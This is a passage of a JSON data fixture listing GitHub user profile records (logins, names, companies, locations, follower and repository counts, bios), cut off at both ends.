"https://avatars.githubusercontent.com/u/17287988?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 9, + "public_gists_count": 1, + "public_repositories_count": 55, + "created_at": "2016-02-17T06:54:43Z", + "updated_at": "2024-08-27T11:51:47Z", + "node_id": "MDQ6VXNlcjE3Mjg3OTg4", + "bio": "eng.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 588, + "fields": { + "nest_created_at": "2024-09-11T21:29:44.889Z", + "nest_updated_at": "2024-09-11T21:29:44.889Z", + "name": "", + "login": "traw", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2088753?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 138, + "created_at": "2012-08-03T09:37:06Z", + "updated_at": "2024-07-31T12:54:33Z", + "node_id": "MDQ6VXNlcjIwODg3NTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 589, + "fields": { + "nest_created_at": "2024-09-11T21:29:46.110Z", + "nest_updated_at": "2024-09-22T18:28:50.679Z", + "name": "Jordan Sherman", + "login": "jsherm-fwdsec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87384545?v=4", + "company": "Forward Security", + "location": "Toronto", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 8, + "public_gists_count": 2, + "public_repositories_count": 8, + "created_at": "2021-07-13T16:14:10Z", + "updated_at": "2024-03-13T16:49:22Z", + "node_id": "MDQ6VXNlcjg3Mzg0NTQ1", + "bio": "Application Security Consultant at Forward Security aka @deleterepo", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 590, + "fields": { + "nest_created_at": "2024-09-11T21:29:53.304Z", + "nest_updated_at": "2024-09-11T21:29:57.091Z", + "name": "PSDT707", + "login": "Dazmed707", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/35184132?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 13, + "public_gists_count": 1, + "public_repositories_count": 21, + "created_at": "2018-01-07T04:19:47Z", + "updated_at": "2024-08-20T07:11:06Z", + "node_id": "MDQ6VXNlcjM1MTg0MTMy", + "bio": "ETHICAL HACKER\r\nRED TEAM\r\nBLUE TEAM\r\nPURPLE TEAM", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 591, + "fields": { + "nest_created_at": "2024-09-11T21:29:53.699Z", + "nest_updated_at": "2024-09-22T18:25:58.051Z", + "name": "Karim shoair", + "login": "D4Vinci", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20604835?v=4", + "company": "", + "location": "Egypt", + "collaborators_count": 0, + "following_count": 78, + "followers_count": 1862, + "public_gists_count": 2, + "public_repositories_count": 38, + "created_at": "2016-07-22T22:10:18Z", + "updated_at": "2024-08-06T00:01:56Z", + "node_id": "MDQ6VXNlcjIwNjA0ODM1", + "bio": "A high&low-level coder and a lot of things in between.\r\nAn extremely curious creature who loves to learn.\r\nBreak things or make things that break things.", + "is_hireable": true, + "twitter_username": "D4Vinci1" + } +}, +{ + "model": "github.user", + "pk": 592, + "fields": { + "nest_created_at": "2024-09-11T21:29:54.942Z", + "nest_updated_at": "2024-09-11T21:29:54.942Z", + "name": "", + "login": "ashu223", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/55798020?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-09-25T13:56:34Z", + "updated_at": "2022-03-27T09:22:32Z", + "node_id": "MDQ6VXNlcjU1Nzk4MDIw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 593, + "fields": { + "nest_created_at": "2024-09-11T21:29:58.377Z", + "nest_updated_at": "2024-09-11T21:29:58.377Z", + "name": "", + "login": "pretech86", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46816468?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 88, + "followers_count": 52, + "public_gists_count": 0, + "public_repositories_count": 308, + "created_at": "2019-01-18T12:48:50Z", + "updated_at": "2023-05-02T10:09:48Z", + "node_id": "MDQ6VXNlcjQ2ODE2NDY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 594, + "fields": { + "nest_created_at": "2024-09-11T21:29:59.713Z", + "nest_updated_at": "2024-09-11T21:29:59.713Z", + "name": "", + "login": "RuchinHimasha", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81069002?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2021-03-21T07:01:25Z", + "updated_at": "2024-08-19T18:04:18Z", + "node_id": "MDQ6VXNlcjgxMDY5MDAy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 595, + "fields": { + "nest_created_at": "2024-09-11T21:30:00.518Z", + "nest_updated_at": "2024-09-11T21:30:00.518Z", + "name": "Mohit Saran", + "login": "kinghacker0", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48322980?v=4", + "company": "Hackersking", + "location": "India", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 821, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2019-03-07T13:51:15Z", + "updated_at": "2024-02-22T02:27:22Z", + "node_id": "MDQ6VXNlcjQ4MzIyOTgw", + "bio": "I am Mohit Saran, A student and Cybersecurity Researcher.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 596, + "fields": { + "nest_created_at": "2024-09-11T21:30:01.366Z", + "nest_updated_at": "2024-09-11T21:30:01.366Z", + "name": "", + "login": "lazengann86-zz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/82061136?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-04-06T20:51:15Z", + "updated_at": "2022-07-06T11:42:07Z", + "node_id": "MDQ6VXNlcjgyMDYxMTM2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 597, + "fields": { + "nest_created_at": "2024-09-11T21:30:02.214Z", + "nest_updated_at": "2024-09-11T21:30:02.214Z", + "name": "Enigma", + "login": "Enigma1309", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/94917588?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2021-11-23T15:11:06Z", + "updated_at": "2024-07-25T05:26:21Z", + "node_id": "U_kgDOBahT1A", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 598, + "fields": { + "nest_created_at": "2024-09-11T21:30:03.052Z", + "nest_updated_at": "2024-09-11T21:30:03.052Z", + "name": "", + "login": "Docentcafedry", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/100312043?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2022-02-23T18:55:39Z", + "updated_at": "2024-06-08T16:19:01Z", + "node_id": "U_kgDOBfqj6w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 599, + "fields": { + "nest_created_at": "2024-09-11T21:30:03.917Z", + "nest_updated_at": "2024-09-11T21:30:03.918Z", + "name": "", + "login": "dhunt12", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92772962?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 14, + "created_at": "2021-10-19T04:18:04Z", + "updated_at": "2023-01-02T11:25:02Z", + "node_id": "U_kgDOBYeaYg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 600, + "fields": { + "nest_created_at": "2024-09-11T21:30:04.790Z", + "nest_updated_at": "2024-09-11T21:30:04.790Z", + "name": "", + "login": "DarkAngel-24", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/75729041?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2020-12-09T10:35:43Z", + "updated_at": "2024-08-09T12:04:19Z", + "node_id": "MDQ6VXNlcjc1NzI5MDQx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 601, + "fields": { + "nest_created_at": "2024-09-11T21:30:05.606Z", + "nest_updated_at": "2024-09-11T21:30:05.606Z", + "name": "Nasyx Rakeeb", + "login": "nasyx-rakeeb", + "email": "nasyxrakeeb2@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/89723867?v=4", + "company": "Artosyx", + "location": "Jammu and kashmir", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 64, + "created_at": "2021-08-29T07:29:04Z", + "updated_at": "2024-07-14T09:16:20Z", + "node_id": "MDQ6VXNlcjg5NzIzODY3", + "bio": "Full-Stack Developer | Web and Mobile", + "is_hireable": false, + "twitter_username": "nasyx_rakeeb" + } +}, +{ + "model": "github.user", + "pk": 602, + "fields": { + "nest_created_at": "2024-09-11T21:30:06.432Z", + "nest_updated_at": "2024-09-11T21:30:06.432Z", + "name": "", + "login": "BimBom123", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/107060079?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-06-07T15:16:22Z", + "updated_at": "2022-06-07T15:16:22Z", + "node_id": "U_kgDOBmGbbw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 603, + "fields": { + "nest_created_at": "2024-09-11T21:30:07.269Z", + "nest_updated_at": "2024-09-11T21:30:07.269Z", + "name": "", + "login": "younesisbabe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/109686880?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-07-20T16:42:51Z", + "updated_at": "2024-02-27T22:27:31Z", + "node_id": "U_kgDOBomwYA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 604, + "fields": { + "nest_created_at": "2024-09-11T21:30:08.099Z", + "nest_updated_at": "2024-09-11T21:30:08.099Z", + "name": "", + "login": "Evolgate", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81663010?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 0, + "created_at": "2021-03-31T02:06:44Z", + "updated_at": "2023-12-01T08:12:47Z", + "node_id": "MDQ6VXNlcjgxNjYzMDEw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 605, + "fields": { + "nest_created_at": "2024-09-11T21:30:08.926Z", + "nest_updated_at": "2024-09-11T21:30:08.926Z", + "name": "", + "login": "immortal-007", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/111071211?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-08-11T14:50:53Z", + "updated_at": "2022-08-27T10:09:39Z", + "node_id": "U_kgDOBp7P6w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 606, + "fields": { + "nest_created_at": "2024-09-11T21:30:09.729Z", + "nest_updated_at": "2024-09-11T21:30:09.729Z", + "name": "Khaliduzzaman Mredul", + "login": "SERPENT47", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/77933538?v=4", + "company": "AIUB", + "location": "Classified", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2021-01-24T17:30:56Z", + "updated_at": "2024-09-03T12:36:33Z", + "node_id": "MDQ6VXNlcjc3OTMzNTM4", + "bio": "A man behind the mask!", + "is_hireable": false, + "twitter_username": "SERPENT" + } +}, +{ + "model": "github.user", + "pk": 607, + "fields": { + "nest_created_at": "2024-09-11T21:30:10.566Z", + "nest_updated_at": "2024-09-11T21:30:10.566Z", + "name": "hridyen prashar", + "login": "hridyen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/110184907?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2022-07-28T15:08:56Z", + "updated_at": "2024-08-18T10:31:31Z", + "node_id": "U_kgDOBpFJyw", + "bio": "currently learning flutter and mobile development ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 608, + "fields": { + "nest_created_at": "2024-09-11T21:30:11.386Z", + "nest_updated_at": "2024-09-11T21:30:11.386Z", + "name": "Cristian Donara", + "login": "DonnyDevIT", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87426979?v=4", + "company": "Shaggy Owl SRL", + "location": "Viterbo", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 2, + "public_repositories_count": 1, + "created_at": "2021-07-14T12:19:38Z", + "updated_at": "2024-08-27T06:55:27Z", + "node_id": "MDQ6VXNlcjg3NDI2OTc5", + "bio": "Flutter 💙", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 609, + "fields": { + "nest_created_at": "2024-09-11T21:30:12.228Z", + "nest_updated_at": "2024-09-11T21:30:12.228Z", + "name": "harits medina", + "login": "haritsmedina", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/74809994?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2020-11-21T06:41:10Z", + "updated_at": "2023-10-17T07:55:53Z", + "node_id": "MDQ6VXNlcjc0ODA5OTk0", + "bio": "Every Error Makes You Stronger!", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 610, + "fields": { + "nest_created_at": "2024-09-11T21:30:13.035Z", + "nest_updated_at": "2024-09-11T21:30:13.035Z", + "name": "", + "login": "toktokprojeto", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/111388633?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-08-16T19:32:01Z", + "updated_at": "2023-04-27T14:15:32Z", + "node_id": "U_kgDOBqOn2Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 611, + "fields": { + "nest_created_at": "2024-09-11T21:30:13.965Z", + "nest_updated_at": "2024-09-11T21:30:13.965Z", + "name": "", + "login": "pandu455", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/104158045?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-04-21T16:17:10Z", + "updated_at": "2022-09-29T05:31:49Z", + "node_id": "U_kgDOBjVTXQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 612, + "fields": { + "nest_created_at": "2024-09-11T21:30:14.818Z", + "nest_updated_at": "2024-09-11T21:30:16.483Z", + "name": "", + "login": "fazilbaig1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25384256?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-01-27T10:34:22Z", + "updated_at": "2022-10-25T11:45:50Z", + "node_id": "MDQ6VXNlcjI1Mzg0MjU2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 613, + "fields": { + "nest_created_at": "2024-09-11T21:30:15.669Z", + "nest_updated_at": "2024-09-11T21:30:15.669Z", + "name": "", + "login": "angelburning", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/110586474?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-08-04T05:10:11Z", + "updated_at": "2022-10-04T23:30:31Z", + "node_id": "U_kgDOBpdqag", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 614, + "fields": { + "nest_created_at": "2024-09-11T21:30:17.320Z", + "nest_updated_at": "2024-09-11T21:30:17.320Z", + "name": "", + "login": "ifood318", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/35065786?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-01-03T11:56:14Z", + "updated_at": "2022-10-11T16:20:52Z", + "node_id": "MDQ6VXNlcjM1MDY1Nzg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 615, + "fields": { + "nest_created_at": "2024-09-11T21:30:18.222Z", + "nest_updated_at": "2024-09-11T21:30:18.222Z", + "name": "", + "login": "xankitmakwana", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/115987658?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-10-17T09:53:32Z", + "updated_at": "2022-11-02T12:28:31Z", + "node_id": "U_kgDOBunUyg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 616, + "fields": { + "nest_created_at": "2024-09-11T21:30:19.046Z", + "nest_updated_at": "2024-09-11T21:30:19.046Z", + "name": "", + "login": "Deejaz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/118346226?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-11-16T09:01:49Z", + "updated_at": "2023-07-26T12:25:57Z", + "node_id": "U_kgDOBw3R8g", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 617, + "fields": { + "nest_created_at": "2024-09-11T21:30:19.924Z", + "nest_updated_at": "2024-09-11T21:30:21.610Z", + "name": "", + "login": "MatarEmad", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/119739686?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-12-03T12:49:50Z", + "updated_at": "2022-12-03T12:49:50Z", + "node_id": "U_kgDOByMVJg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 618, + "fields": { + "nest_created_at": "2024-09-11T21:30:22.434Z", + "nest_updated_at": "2024-09-11T21:30:28.298Z", + "name": "", + "login": "Knightngoding", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/114855055?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-10-02T09:07:56Z", + "updated_at": "2022-10-02T09:09:36Z", + "node_id": "U_kgDOBtiMjw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 619, + "fields": { + "nest_created_at": "2024-09-11T21:30:23.296Z", + "nest_updated_at": "2024-09-11T21:30:23.296Z", + "name": "Richard", + "login": "RichardPompeo", + "email": "pompeorichard@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/65838395?v=4", + "company": "Tunts.Rocks", + "location": "Florianópolis, Brasil", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2020-05-24T02:05:06Z", + "updated_at": "2024-07-31T13:46:28Z", + "node_id": "MDQ6VXNlcjY1ODM4Mzk1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 620, + "fields": { + "nest_created_at": "2024-09-11T21:30:24.127Z", + "nest_updated_at": "2024-09-11T21:30:24.127Z", + "name": "", + "login": "sameer706007", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/122555364?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-01-12T16:55:44Z", + "updated_at": "2023-02-05T10:08:23Z", + "node_id": "U_kgDOB04L5A", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 621, + "fields": { + "nest_created_at": "2024-09-11T21:30:24.941Z", + "nest_updated_at": "2024-09-11T21:30:24.941Z", + "name": "", + "login": "kali282", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/123737653?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-01-27T11:38:21Z", + "updated_at": "2023-01-27T11:38:21Z", + "node_id": "U_kgDOB2AWNQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 622, + "fields": { + "nest_created_at": "2024-09-11T21:30:25.796Z", + "nest_updated_at": "2024-09-11T21:30:25.796Z", + "name": "DAKOJU S S S S JAYA KUMAR", + "login": "jayakumar571", + "email": "jkips2024@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/96644707?v=4", + "company": "Annamacharya Institute of Technology & Sciences", + "location": "Tirupati", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2021-12-25T06:27:59Z", + "updated_at": "2023-06-18T09:39:14Z", + "node_id": "U_kgDOBcKuYw", + "bio": "Everyday world Traveller", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 623, + "fields": { + "nest_created_at": "2024-09-11T21:30:26.598Z", + "nest_updated_at": "2024-09-22T18:25:56.668Z", + "name": "", + "login": "rockstar0050", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/124309738?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-02-02T20:58:07Z", + "updated_at": "2023-05-09T18:12:54Z", + "node_id": "U_kgDOB2jQ6g", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 624, + "fields": { + "nest_created_at": "2024-09-11T21:30:27.485Z", + "nest_updated_at": "2024-09-11T21:30:27.485Z", + "name": "", + "login": "hak98", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/127365739?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-03-09T02:04:55Z", + "updated_at": "2023-03-09T02:04:55Z", + "node_id": "U_kgDOB5dyaw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 625, + "fields": { + "nest_created_at": "2024-09-11T21:30:29.139Z", + "nest_updated_at": "2024-09-11T21:30:29.139Z", + "name": "", + "login": "dorz66", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/128035147?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-03-16T09:11:15Z", + "updated_at": "2023-05-09T14:41:03Z", + "node_id": "U_kgDOB6GpSw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 626, + "fields": { + "nest_created_at": "2024-09-11T21:30:29.970Z", + "nest_updated_at": "2024-09-11T21:30:29.970Z", + "name": "", + "login": "8590106078", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/118496539?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-11-18T02:23:18Z", + "updated_at": "2022-11-18T02:26:43Z", + "node_id": "U_kgDOBxAdGw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 627, + "fields": { + "nest_created_at": "2024-09-11T21:30:30.769Z", + "nest_updated_at": "2024-09-11T21:30:30.769Z", + "name": "", + "login": "Gc1606", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51678713?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-06-10T19:40:16Z", + "updated_at": "2023-07-12T23:57:47Z", + "node_id": "MDQ6VXNlcjUxNjc4NzEz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 628, + "fields": { + "nest_created_at": "2024-09-11T21:30:31.593Z", + "nest_updated_at": "2024-09-11T21:30:31.594Z", + "name": "", + "login": "descontrol123", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/117747051?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-11-08T14:11:59Z", + "updated_at": "2023-07-19T02:54:45Z", + "node_id": "U_kgDOBwStaw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 629, + "fields": { + "nest_created_at": "2024-09-11T21:30:32.432Z", + "nest_updated_at": "2024-09-11T21:30:32.432Z", + "name": "Warner Miguel", + "login": "Miguelwarner", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22844619?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-10-14T19:05:58Z", + "updated_at": "2024-08-28T11:46:35Z", + "node_id": "MDQ6VXNlcjIyODQ0NjE5", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 630, + "fields": { + "nest_created_at": "2024-09-11T21:30:33.274Z", + "nest_updated_at": "2024-09-11T21:30:33.274Z", + "name": "", + "login": "Oscax", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/144653126?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-09-11T05:39:46Z", + "updated_at": "2023-09-11T05:42:30Z", + "node_id": "U_kgDOCJ87Rg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 631, + "fields": { + "nest_created_at": "2024-09-11T21:30:34.067Z", + "nest_updated_at": "2024-09-11T21:30:34.067Z", + "name": "", + "login": "Sfredie", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42473679?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-08-17T15:11:25Z", + "updated_at": "2023-09-20T13:18:48Z", + "node_id": "MDQ6VXNlcjQyNDczNjc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 632, + "fields": { + "nest_created_at": "2024-09-11T21:30:34.886Z", + "nest_updated_at": "2024-09-11T21:30:34.886Z", + "name": "noman", + "login": "unexpectedbro", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/128038547?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-03-16T09:51:51Z", + "updated_at": "2023-03-16T10:20:06Z", + "node_id": "U_kgDOB6G2kw", + "bio": "trying to do something", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 633, + "fields": { + "nest_created_at": "2024-09-11T21:30:35.712Z", + "nest_updated_at": "2024-09-11T21:30:35.712Z", + "name": "", + "login": "JogendraS27", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/93839106?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-11-06T18:42:35Z", + "updated_at": "2024-06-23T15:08:29Z", + "node_id": "U_kgDOBZffAg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 634, + "fields": { + "nest_created_at": "2024-09-11T21:30:36.595Z", + "nest_updated_at": "2024-09-22T18:25:58.680Z", + "name": "", + "login": "LucaReggiannini", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46603573?v=4", + "company": "", + "location": "", + 